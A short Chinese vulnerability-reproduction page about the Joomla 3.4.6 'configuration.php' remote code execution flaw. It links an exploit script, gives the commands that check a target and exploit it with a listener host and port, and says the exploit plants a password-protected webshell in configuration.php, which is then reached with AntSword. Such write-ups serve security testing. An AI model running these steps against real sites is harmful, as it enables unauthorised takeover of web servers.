Joomla_3.4.6_-_’configuration.php’_Remote_Code

# Joomla 3.4.6 – ‘configuration.php’ Remote Code Execution

===

一、漏洞简介
————

Joomla 3.4.6 – \’configuration.php\’ Remote Code Execution

二、影响范围
————

Joomla 3.0.0 至 3.4.6

三、复现过程
————

https://github.com/ianxtianxt/Joomla-3.4.6\-\–configuration.php-Remote-Code-Execution

### 脚本验证

验证：

python3 test.py -t http://127.0.0.1:8080/

![](/static/qingy/Joomla_3.4.6_-_’configuration.php’_Remote_Code_Execution/img/rId25.png)

显示”Vulnerable”证明存在漏洞

利用：

python3 test.py -t http://127.0.0.1:8080/ –exploit –lhost 192.168.31.126 –lport 2121

![](/static/qingy/Joomla_3.4.6_-_’configuration.php’_Remote_Code_Execution/img/rId26.png)

执行成功

并在”configuration.php”写入**随机密码**的一句话木马![](/static/qingy/Joomla_3.4.6_-_’configuration.php’_Remote_Code_Execution/img/rId27.png)上图的密码为：kyevgbxjmwivdvegohfzwuukuzswxqquthlrsollpxzgiifumi

蚁剑链接测试

![](/static/qingy/Joomla_3.4.6_-_’configuration.php’_Remote_Code_Execution/img/rId28.png)

文章版权归作者所有，未经允许请勿转载。

THE END

国内漏洞库

Joomla_3.4.6_-_’configuration.php’_Remote_Code_Execution

请登录后发表评论

1xscan xss漏扫工具

2红队VS蓝队：网络攻防实战技术解析随书资源

3一些安全技术相关文档存档

4eking管理易Html5Upload接口任意文件上传

5Cloudlog delete_oqrs_line 未授权SQL注入

6资产管理运营系统ufile.api.php SQL注入